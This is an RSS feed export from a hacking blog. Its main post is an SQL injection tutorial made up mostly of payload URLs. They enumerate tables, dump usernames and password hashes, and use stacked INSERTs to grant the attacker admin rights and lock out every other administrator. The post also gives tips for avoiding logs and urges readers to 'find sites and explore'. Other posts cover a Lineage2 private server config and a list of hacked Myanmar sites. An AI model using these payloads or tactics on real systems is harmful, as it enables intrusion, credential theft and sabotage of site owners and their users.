<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Zer0 Day Informer ...</title>
	
	<link>http://heinhtetaung.ulmb.com</link>
	<description>Educational Purpose</description>
	<lastBuildDate>Thu, 07 Oct 2010 03:57:12 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/Zer0DayInformer" /><feedburner:info uri="zer0dayinformer" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:browserFriendly></feedburner:browserFriendly><item>
		<title>SQL Injection</title>
		<link>http://heinhtetaung.ulmb.com/?p=129</link>
		<comments>http://heinhtetaung.ulmb.com/?p=129#comments</comments>
		<pubDate>Fri, 10 Sep 2010 16:13:56 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=129</guid>
		<description><![CDATA[By Bi0la
======
first post, meh&#8230;. anywhome
this tutgoes over finding the amount of columns in the SELECT statement, creating a valid UNION statement, browsing tables/columns in databases, and viewing/editing those values. There is still alot more advanced stuff out there that isnt even mentioned here.
example URL:
[url="http://www.xxx.xx/path/whatever/order.pl?do=addprod&#038;prodid=12"]http://www.xxx.xx/path/whatever/order.pl?d&#8230;d&#038;prodid=12[/url]
we did our tests and found prodid to be injectable, what next?
This [...]]]></description>
			<content:encoded><![CDATA[<p>By Bi0la<br />
======<br />
first post, meh&#8230;. anywhome</p>
<p>this tutgoes over finding the amount of columns in the SELECT statement, creating a valid UNION statement, browsing tables/columns in databases, and viewing/editing those values. There is still alot more advanced stuff out there that isnt even mentioned here.</p>
<p>example URL:<br />
[url="http://www.xxx.xx/path/whatever/order.pl?do=addprod&#038;prodid=12"]http://www.xxx.xx/path/whatever/order.pl?d&#8230;d&#038;prodid=12[/url]<br />
we did our tests and found prodid to be injectable, what next?</p>
<p>This is what i would do. Ill try to dummy it down so you and anyone else learning can understand but just experiencing it for yourself is the best method of learning. Im expecting you to have a little knowledge of sql injection.</p>
<p>First find out how you can comment out of the statement, this is more important in blind sql injection since you want your statement to be inserted without any syntax errors. when the injectable value is a int you usually dont have to single quote to end, if its a string or date etc field you probably do. There are 2 parts to this part, ending the websites SELECT statement correctly before our inserted sql code and trying to comment the rest of the code after our sql code.</p>
<p>Using your example of order.pl?do=addprod&#038;prodid=12<br />
Code:<br />
<code>order.pl?do=addprod&#038;prodid=12 --</code></p>
<p>if that returns the page somewhat normally then we know we can just insert our code after the 12 and just end with a standard comment, we may be commenting out a order by clause sometimes making the page look a little different but the information on the page that would be returned from the database is still being shown. I like putting a space before my comment, ive ran into a database where it didn&#8217;t like the comment butted up against my insert and wouldn&#8217;t work without it, i haven&#8217;t found one that didn&#8217;t like that space so i just make it my practice but try it both ways. If we were dealing with MS-SQL i would add &#8211;sp_password to my comment since that triggers mssql not to log. Speaking of avoiding logging, Use POST type forms instead of modifying the URL if possible and that will help keep any website stats logger from seeing the injection, rarely is POST&#8217;d data logged. But thats only if we have a choice, some fields are GET types only.</p>
<p>now getting back on track, if that does not return any data or causes an error then we try others<br />
Code:<br />
<code>order.pl?do=addprod&#038;prodid=12) --<br />
order.pl?do=addprod&#038;prodid=12)) --<br />
order.pl?do=addprod&#038;prodid=12' --<br />
order.pl?do=addprod&#038;prodid=12') --<br />
order.pl?do=addprod&#038;prodid=12')) --</code></p>
<p>experience will find there are alot more, commen comments are &#8216;&#8211;&#8217; &#8216;#&#8217; or &#8216;/*&#8217; some work, some dont, just have to try.</p>
<p>if &#8220;order.pl?do=addprod&#038;prodid=12&#8242;) &#8211;&#8221; was our working injection then we end the website code with &#8216;) and then insert our code with the standard &#8212; comment at the end. Im going to use &#8220;order.pl?do=addprod&#038;prodid=12 &#8211;&#8221; as our working example.</p>
<p>Next i want to find how many columns are being returned by the websites select statement so i can use UNION correctly, when you UNION two SELECT statements together the amount of columns being returned have to be the same. I use ORDER by to find the amount of columns, you can use the UNION SELECT and keep adding null or 1,2,3 but i find ORDER by faster since some SELECT statements return lots of columns.</p>
<p>Code:<br />
<code>order.pl?do=addprod&#038;prodid=12 ORDER BY 10--</code></p>
<p>note i used a valid prodid of 12 not a -1. if this result returns no error or in a blind injection its returns the page normally you know there are 10 or more columns being returned, add another 10 and keep adding till you see an error. The error in mysql its similer to &#8220;Unknown column &#8216;10&#8242; in &#8216;order clause&#8221; and in ms-sql its similer to &#8220;The ORDER BY position number 10 is out of range of the number of items in the select list.&#8221;. Some columns cant be used in a order by, and will result in an error but its a different error something like &#8220;Picture column cant be used in ORDER BY&#8221;. After i get a column error i would start working backwards till i saw the page correctly again or if its a blind injection i would add one more just to be sure i was really at the last column and not a column that cant be used in a &#8216;order by&#8217; before start working my way backwords till i found the correct amount.</p>
<p>as an example<br />
Code:<br />
<code>order.pl?do=addprod&#038;prodid=12 ORDER BY 10 -- Returns no error<br />
order.pl?do=addprod&#038;prodid=12 ORDER BY 20 -- Returns no error<br />
order.pl?do=addprod&#038;prodid=12 ORDER BY 30 -- Error about unknown column 30, i start backing up<br />
order.pl?do=addprod&#038;prodid=12 ORDER BY 25 -- Returns no error<br />
order.pl?do=addprod&#038;prodid=12 ORDER BY 26 -- Error about unknown column 26.</code></p>
<p>We know the websites Select statement is returning 25 columns, much faster then trying UNION ALL SELECT null,null,null etc etc one at a time till we get to the 25 =)</p>
<p>Now to use UNION to find a valid UNION statement. Most pages will only work with the first row returned from a select statement so we want to make the websites request return nothing so our union select will return the first row of data. this can be done by changing the injectable value to something invalid like -1, or using 12 and 1=2 both usually work, sometimes only one. Injectable search pages are nice since you can view many rows at once but we will take what we can get. For our example ill say our page only displays the first row of returned data. UNION ALL SELECT will return all data even duplicate, while UNION SELECT will drop duplicate rows.</p>
<p>Code:<br />
<code>order.pl?do=addprod&#038;prodid=-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 --</code></p>
<p>I dont use a FROM anything since i just want my inputted data to be displayed, and if there aren&#8217;t any expected string but got int errors it will be. If you get an error about int incompatable with string then start from the beginning and start changing 1,2,3,etc to &#8216;1&#8242;,2,3,etc if that make an error of int incompatable with string then you know the first field is looking for INT only. change &#8216;1&#8242; back to 1 and change 2 to &#8216;2&#8242;, if that get you string incompatable with int then leave &#8216;2&#8242; as &#8216;2&#8242; and change 3 to &#8216;3&#8242;, work your way all the way through till no more errors and you see your inserted data on the page. Some people use null,null,null,etc as their base UNION SELECT but sometimes the page needs data being returned and not null or it wont display. But you have both methods, use both when needed. I like using 1,2,3,etc because when the page displays i know what columns i can use to return data with. so if out of the 25 columns i only see the numbers 3,7,22 actually visable on the page i know to use those to return data with, where if i used null, ill have to try each one till i see something.</p>
<p>Code:<br />
-1 UNION ALL SELECT 1,2,@@version,4,5,6,user,8,9,10,11,12,13,14,15,16,17,18,19,20,21,db_name(0),23,24,25 &#8211;</p>
<p>@@version returns the database version. Its good idea to know what database/version is so you know what commands will work.<br />
user or user() returns the current database user, if the username is something specific like calenderuser or photoweb then we probably can only view whats in the current database, but if we get lucky and find a page accessing the database as an admin, such as dbo then we can lurk into other databases.<br />
In MS-SQL db_name(0) returns current database name, inc 0,1,2,3 till you see all the other databases.</p>
<p>All the standard stuff is done, we now have a working UNION SELECT statement and we can now start looking around. Mysql v4 does not support information_schema, you will have to guess table and column names. Leave the SELECT as 1,2,3,etc and just guess a FROM tablename.</p>
<p>Code:<br />
<code>-1 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM users--</code></p>
<p>If the page loads with your numbers visible still you guessed a good tablename. If you can&#8217;t find any good table names there is a chance the site is using a prefix in their table names. If the site displays error messages then just to run around the site trying to cause errors, inject a single quote somewhere and see what it errors with. Alot of times it will display the code around the error sometimes displaying a prefix that would be impossible to guess. Like if i see an error that displays a table name of wka_news, then i might try to guess table names wka_users etc&#8230; Once you guess a good tablename then start guessing columns in that table. Another good idea is use a plugin called &#8216;Web Developer&#8217; for firefox and run around the site viewing form information. Majority of the time what the fields are named in the form are also what their named in the database. I also use this plugin alot to find hidden fields and to inject in drop down menu&#8217;s etc that the webdevel might have overlooked in sanatizing.</p>
<p>To find tables and columns in mysql v5 and ms-sql is much easier since they support information_schema, and ms-sql also support sysobjects to browse (google sysobjects for that method, im not gonna get into it).</p>
<p>Code:<br />
<code>-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.TABLES --<br />
-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM phpbb2.INFORMATION_SCHEMA.TABLES --</code></p>
<p>the first one will return the table names in the current database, the second one will return the tables from the specified database phpbb2. You&#8217;ll need to know the database names before plugging away. Lets say the first table name is USERS in the current database. if we can only see the first row of returned data then we can use this to see the next.<br />
Code:<br />
<code>-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.TABLES WHERE table_name NOT IN ('USERS') --</code></p>
<p>will return the next table name, lets say HEADLINES. now we just add HEADLINES to our not in to get the next table.<br />
Code:<br />
<code>-1 UNION ALL SELECT 1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.TABLES WHERE table_name NOT IN ('USERS','HEADLINE') --</code></p>
<p>And keep going till you get them all. Its a pain i know&#8230; if you found a search page injectable this process is simpler because you would see all the rows, or atleast a handfull.</p>
<p>if we see a table name that sparks our interest like the USERS table we can view the columns in the table using.<br />
Code:<br />
-1 UNION ALL SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=&#8217;USERS&#8217; &#8211;</p>
<p>be sure to specify table_name= or you&#8217;ll get every column in the database not just in your table. Lets say ID is the first column returned, then we do.<br />
Code:<br />
<code>-1 UNION ALL SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name='USERS' and column_name not in ('ID') --</code></p>
<p>that returns the next column, USERNAME<br />
Code:<br />
-1 UNION ALL SELECT 1,2,column_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=&#8217;USERS&#8217; and column_name not in (&#8216;ID&#8217;,'USERNAME&#8217;) &#8211;</p>
<p>etc etc till we get all the columns in the table<br />
to be simple lets just say there is only a few columns<br />
ID<br />
USERNAME<br />
PASSWORD<br />
USERLEVEL<br />
EMAIL</p>
<p>lets grab the first username/password remembering that columns 3,7,22 display returned data lets get multiple columns at once. To get multiple columns at once returned into 1 column in MySQL you can use concat(username,&#8217;:',password) and in MS-SQL you can use username %2b &#8216;:&#8217; %2b password that will merge the data from username column and password column and place : inbetween. usefull if you have 1 column to return data in or to clean up the result&#8217;s html.</p>
<p>Code:<br />
<code>-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23<br />
,24,25 FROM USERS --</code></p>
<p>Lets say this returned john / d8c250d26a7852481fcc9527e94ead69 / 10</p>
<p>Code:<br />
<code>-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23<br />
,24,25 FROM USERS WHERE USERNAME NOT IN ('john')--</code></p>
<p>Lets say this returned carl / 8bf79d49c62dd1753620135cb9591243 / 0<br />
userlevel 0, this user must be a regular user. But we try to crack johns password but no luck, we try carls and get password snarf but this user has no cool privlidges. I want to find other users with atleast some privs so we can do this<br />
Code:<br />
<code>-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23<br />
,24,25 FROM USERS WHERE USERNAME NOT IN ('john') and USERLEVEL > 0 --</code></p>
<p>returns the next user with a userlevel higher then 0. we go through all the users and get 5 more users but with all userlevels of 5. Eff that lets go for gold. What to do&#8230; Our options would be change johns password to a md5 hash we know the password to, change his email and use the &#8216;forgot password&#8217; form to get it emailed then change the email back(carefull of this one as sometimes the password gets reset to something random before getting emailed), change carls userlevel to 10 since we already cracked his password, or make an account on this site and then change our newly created account to userlevel 10. I would opt for creating an account since its less noticeable if you plan on keeping admin rights for awhile. Use the website to make an account if possible since it will create all the propper table/column data throughout the database, just making a user into one table sometimes isnt enough, there could be another table with user information as well where if not populated with correct data wont let us login. once you make an account on the site lets find it to be sure its there.</p>
<p>Code:<br />
<code>-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23<br />
,24,25 FROM USERS WHERE USERNAME='foo' --</code></p>
<p>returns our username foo, passwordhash, 0. awesome, lets change our userlevel.</p>
<p>Code:<br />
12; INSERT INTO USERS (USERLEVEL) VALUES (&#8216;10&#8242;) WHERE USERNAME=&#8217;foo&#8217; &#8211;</p>
<p>its important to use the WHERE clause here with a value that will equal to only the row you want to change, most tables have a column like ID wich is unique and is usefull in making sure your only changing 1 row. not using any where clause would change EVERY userlevel to 10&#8230; could be funny but very noticable.</p>
<p>now lets check our username again.<br />
Code:<br />
-1 UNION ALL SELECT 1,2,USERNAME,4,5,6,PASSWORD,8,9,10,11,12,13,14,15,16,17,18,19,20,21,USERLEVEL,23<br />
,24,25 FROM USERS WHERE USERNAME=&#8217;foo&#8217; &#8211;</p>
<p>we get foo / passwordhash / 10, oh snap lol~</p>
<p>now we can login as foo and see all the cool site admin tools&#8230;<br />
but we play around and change something that is definately going to get you caught, well lets go for double gold and make it tuff for em to fix. change the passwords of all the admins/mods</p>
<p>Code:<br />
12; INSERT INTO USERS (PASSWORD,EMAIL) VALUES (&#8216;1&#8242;,&#8217;suckit@aol.com&#8217;) WHERE USERLEVEL > 0 and USERNAME NOT IN (&#8216;foo&#8217;) &#8211;</p>
<p>changed all the mods and admin besides ours to a invalid password hash and a random email, so now they cant login and if they try to reset their pass it will go to some random email. Looks like some web admin wished they backed up their database&#8230;</p>
<p>Im done, this took awhile to write, i just did it on the spot and typed everything out by hand so hopefully all my commands are spelled correct. I would like to thanks ephedrine for making this long post possible Wink</p>
<p>obviously your gonna need to apply these examples to your own page and hurdle the many unique obsticles not covered here. but its a learning experience, find sites and explore~</p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=129&amp;n=SQL+Injection+&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=129&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=129&amp;title=SQL+Injection+" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=129&amp;t=SQL+Injection+" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=129&amp;title=SQL+Injection+" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=129&amp;t=SQL+Injection+" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=SQL+Injection++-+http://b2l.me/aqts2d&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=SQL+Injection+&amp;body=Link: http://heinhtetaung.ulmb.com/?p=129 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A By%20Bi0la%0D%0A%3D%3D%3D%3D%3D%3D%0D%0Afirst%20post%2C%20meh....%20anywhome%0D%0A%0D%0Athis%20tutgoes%20over%20finding%20the%20amount%20of%20columns%20in%20the%20SELECT%20statement%2C%20creating%20a%20valid%20UNION%20statement%2C%20browsing%20tables%2Fcolumns%20in%20databases%2C%20and%20viewing%2Fediting%20those%20values.%20There%20is%20still%20alot%20more%20advanced%20stuff%20out%20there%20that%20isnt%20even%20mentio" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=129&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D129&amp;t=SQL%20Injection%20" id="facebook_share_button_129" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_129') || document.getElementById('facebook_share_icon_129') || document.getElementById('facebook_share_both_129') || document.getElementById('facebook_share_button_129');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_129') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=129</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Lineage2 Server config When you can’t login</title>
		<link>http://heinhtetaung.ulmb.com/?p=118</link>
		<comments>http://heinhtetaung.ulmb.com/?p=118#comments</comments>
		<pubDate>Sat, 31 Jul 2010 06:24:37 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=118</guid>
		<description><![CDATA[ဒီဟာေလး ကို server.properties မွာ ထည့္ေပးပါ 
# Bind ip of the gameserver, use * to bind on all available IPs
GameserverHostname=*
GameserverPort=7777
# This is transmitted to the clients connecting from an external network, so it has to be a public IP or resolvable hostname
ExternalHostname=WAN IP
# This is transmitted to the client from the same network, so it has [...]]]></description>
			<content:encoded><![CDATA[<p>ဒီဟာေလး ကို server.properties မွာ ထည့္ေပးပါ </p>
<blockquote><p># Bind ip of the gameserver, use * to bind on all available IPs<br />
GameserverHostname=*<br />
GameserverPort=7777<br />
# This is transmitted to the clients connecting from an external network, so it has to be a public IP or resolvable hostname<br />
ExternalHostname=<span style="color: red;">WAN IP</span><br />
# This is transmitted to the client from the same network, so it has to be a local IP or resolvable hostname<br />
InternalHostname=<span style="color: blue;">LAN IP</span><br />
# Define internal networks (10.0.0.0/8,192.168.0.0/16 is default internal networks)<br />
InternalNetworks=<br />
# Define optional networks and router IPs<br />
# IP (200.100.200.100) or fully qualified domain name<br />
# (google.com) that resolves to an IP (use ping to determine if a domain resolves).<br />
# Format: ip,net/mask;ip,net/mask,net/mask<br />
# (mask 192.168.0.0/16 or 192.168.0.0/255.255.0.0 would be 192.168.*.*)<br />
# Note: keep InternalNetworks and OptionalNetworks blank for compatibility with older login server<br />
OptionalNetworks=</p>
<p># Bind ip of the loginserver, use * to bind on all available IPs<br />
LoginserverHostname=*<br />
LoginserverPort=2106<br />
LoginTryBeforeBan=20</p>
<p># The Loginserver host and port<br />
LoginPort=9014<br />
LoginHost=LAN IP </p></blockquote>
<p>ေအာက္ က ဟာေလး ကို loginserver.properties မွာ ထည့္လိုက္ပါ ။<br />
<blockquote>
This is transmitted to the clients connecting from an external network, so it has to be a public IP or resolvable hostname<br />
ExternalHostname=<span style="color: red;">WAN IP</span></p>
<p># This is transmitted to the client from the same network, so it has to be a local IP or resolvable hostname<br />
InternalHostname=<span style="color: blue;">LAN IP</span></p>
<p># Bind ip of the loginserver, use * to bind on all available IPs<br />
LoginserverHostname=*<br />
LoginserverPort=2106<br />
LoginTryBeforeBan=20<br />
GMMinLevel=200</p>
<p># The port on which login will listen for GameServers<br />
LoginPort=9014<br />
LoginHostname=*   &#8211;&gt; i add this line here</p>
<p>notepad C:\WINDOWS\system32\drivers\etc\hosts<br />
127.0.0.1 localhost<br />
localhost L2authd.lineage2.com<br />
localhost nprotect.lineage2.com</p>
</blockquote>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=118&amp;n=Lineage2+Server+config+When+you+can%27t+login&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
			<a href="http://heinhtetaung.ulmb.com/?p=118&amp;feed=comments-rss2" rel="nofollow" class="external" title="Subscribe to the comments for this post?">Subscribe to the comments for this post?</a>
		</li>
		<li class="shr-delicious">
			<a href="http://delicious.com/post?url=http://heinhtetaung.ulmb.com/?p=118&amp;title=Lineage2+Server+config+When+you+can%27t+login" rel="nofollow" class="external" title="Share this on del.icio.us">Share this on del.icio.us</a>
		</li>
		<li class="shr-facebook">
			<a href="http://www.facebook.com/share.php?v=4&amp;src=bm&amp;u=http://heinhtetaung.ulmb.com/?p=118&amp;t=Lineage2+Server+config+When+you+can%27t+login" rel="nofollow" class="external" title="Share this on Facebook">Share this on Facebook</a>
		</li>
		<li class="shr-googlebookmarks">
			<a href="http://www.google.com/bookmarks/mark?op=add&amp;bkmk=http://heinhtetaung.ulmb.com/?p=118&amp;title=Lineage2+Server+config+When+you+can%27t+login" rel="nofollow" class="external" title="Add this to Google Bookmarks">Add this to Google Bookmarks</a>
		</li>
		<li class="shr-myspace">
			<a href="http://www.myspace.com/Modules/PostTo/Pages/?u=http://heinhtetaung.ulmb.com/?p=118&amp;t=Lineage2+Server+config+When+you+can%27t+login" rel="nofollow" class="external" title="Post this to MySpace">Post this to MySpace</a>
		</li>
		<li class="shr-twitter">
			<a href="http://twitter.com/home?status=Lineage2+Server+config+When+you+can%27t+login+-+http://b2l.me/adw5rq&amp;source=shareaholic" rel="nofollow" class="external" title="Tweet This!">Tweet This!</a>
		</li>
		<li class="shr-yahoomail">
			<a href="http://compose.mail.yahoo.com/?Subject=Lineage2+Server+config+When+you+can%27t+login&amp;body=Link: http://heinhtetaung.ulmb.com/?p=118 (sent via shareaholic)%0D%0A%0D%0A----%0D%0A %E1%80%92%E1%80%AE%E1%80%9F%E1%80%AC%E1%80%B1%E1%80%9C%E1%80%B8%20%E1%80%80%E1%80%AD%E1%80%AF%20server.properties%20%E1%80%99%E1%80%BD%E1%80%AC%20%E1%80%91%E1%80%8A%E1%80%B9%E1%80%B7%E1%80%B1%E1%80%95%E1%80%B8%E1%80%95%E1%80%AB%20%0D%0A%23%20Bind%20ip%20of%20the%20gameserver%2C%20use%20%2A%20to%20bind%20on%20all%20available%20IPs%0D%0AGameserverHostname%3D%2A%0D%0AGameserverPort%3D7777%0D%0A%23%20This%20is%20transmitted%20to%20the%20clients%20connecting%20from%20an%20external%20network%2C%20so%20it%20has%20to%20be%20a%20public%20IP%20" rel="nofollow" class="external" title="Email this via Yahoo! Mail">Email this via Yahoo! Mail</a>
		</li>
		<li class="shr-googlebuzz">
			<a href="http://www.google.com/buzz/post?url=http://heinhtetaung.ulmb.com/?p=118&amp;imageurl=" rel="nofollow" class="external" title="Post on Google Buzz">Post on Google Buzz</a>
		</li>
</ul>
<div style="clear:both;"></div>
</div>

<a href="http://www.facebook.com/share.php?u=http%3A%2F%2Fheinhtetaung.ulmb.com%2F%3Fp%3D118&amp;t=Lineage2%20Server%20config%20When%20you%20can%27t%20login" id="facebook_share_button_118" style="font-size:11px; line-height:13px; font-family:'lucida grande',tahoma,verdana,arial,sans-serif; text-decoration:none; display: -moz-inline-block; display:inline-block; padding:1px 20px 0 5px; margin: 5px 0; height:15px; border:1px solid #d8dfea; color: #3B5998; background: #fff url(http://b.static.ak.fbcdn.net/images/share/facebook_share_icon.gif) no-repeat top right;">Share</a>
	<script type="text/javascript">
	var button = document.getElementById('facebook_share_link_118') || document.getElementById('facebook_share_icon_118') || document.getElementById('facebook_share_both_118') || document.getElementById('facebook_share_button_118');
	if (button) {
		button.onclick = function(e) {
			var url = this.href.replace(/share\.php/, 'sharer.php');
			window.open(url,'sharer','toolbar=0,status=0,width=626,height=436');
			return false;
		}
	
		if (button.id === 'facebook_share_button_118') {
			button.onmouseover = function(){
				this.style.color='#fff';
				this.style.borderColor = '#295582';
				this.style.backgroundColor = '#3b5998';
			}
			button.onmouseout = function(){
				this.style.color = '#3b5998';
				this.style.borderColor = '#d8dfea';
				this.style.backgroundColor = '#fff';
			}
		}
	}
	</script>
	]]></content:encoded>
			<wfw:commentRss>http://heinhtetaung.ulmb.com/?feed=rss2&amp;p=118</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Hacked myanmar sites မ်ား</title>
		<link>http://heinhtetaung.ulmb.com/?p=103</link>
		<comments>http://heinhtetaung.ulmb.com/?p=103#comments</comments>
		<pubDate>Tue, 29 Jun 2010 17:21:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Main]]></category>
		<category><![CDATA[Vuln]]></category>

		<guid isPermaLink="false">http://heinhtetaung.ulmb.com/?p=103</guid>
		<description><![CDATA[Hacked ခံထားရေသာ ျမန္မာဆိုဒ္မ်ား ..
sql injection ႏွင့္ deface ထားျခင္း ျဖစ္သည္။ဆိုဒ္မ်ား ကို .htaccess ႏွင့္ ပိတ္ပင္ျခင္းမ်ား ျပဳလုပ္သင့္ျပီး server log မ်ား ထားရွိျခင္းျဖင့္ အသင့္အတင့္ကာကြယ္ႏိုင္ပါသည္။ webmaster မ်ားအေနျဖင့္ မိမိအသံုးျပဳေသာ web apps မ်ား၏ exploit မ်ား vlun မ်ား ကို အစဥ္အျမဲ  ေလ့လာသင့္သည္။





		
			Blog this on Blogger
		
		
			Subscribe to the comments for this post?
		
		
			Share this on del.icio.us
		
		
			Share this on Facebook
		
		
			Add this to Google Bookmarks
		
		
			Post this to MySpace
		
		
			Tweet This!
		
		
			Email [...]]]></description>
			<content:encoded><![CDATA[<p>Hacked ခံထားရေသာ ျမန္မာဆိုဒ္မ်ား ..</p>
<p>sql injection ႏွင့္ deface ထားျခင္း ျဖစ္သည္။ဆိုဒ္မ်ား ကို .htaccess ႏွင့္ ပိတ္ပင္ျခင္းမ်ား ျပဳလုပ္သင့္ျပီး server log မ်ား ထားရွိျခင္းျဖင့္ အသင့္အတင့္ကာကြယ္ႏိုင္ပါသည္။ webmaster မ်ားအေနျဖင့္ မိမိအသံုးျပဳေသာ web apps မ်ား၏ exploit မ်ား vlun မ်ား ကို အစဥ္အျမဲ  ေလ့လာသင့္သည္။</p>
<p><img src="http://heinhtetaung.ulmb.com/wp-content/hacked.png" alt="Hacked Myanmar site " /></p>


<div class="shr-bookmarks shr-bookmarks-expand shr-bookmarks-center shr-bookmarks-bg-wealth">
<ul class="socials">
		<li class="shr-blogger">
			<a href="http://www.blogger.com/blog_this.pyra?t&amp;u=http://heinhtetaung.ulmb.com/?p=103&amp;n=Hacked+myanmar+sites+%E1%80%99%E1%80%BA%E1%80%AC%E1%80%B8&amp;pli=1" rel="nofollow" class="external" title="Blog this on Blogger">Blog this on Blogger</a>
		</li>
		<li class="shr-comfeed">
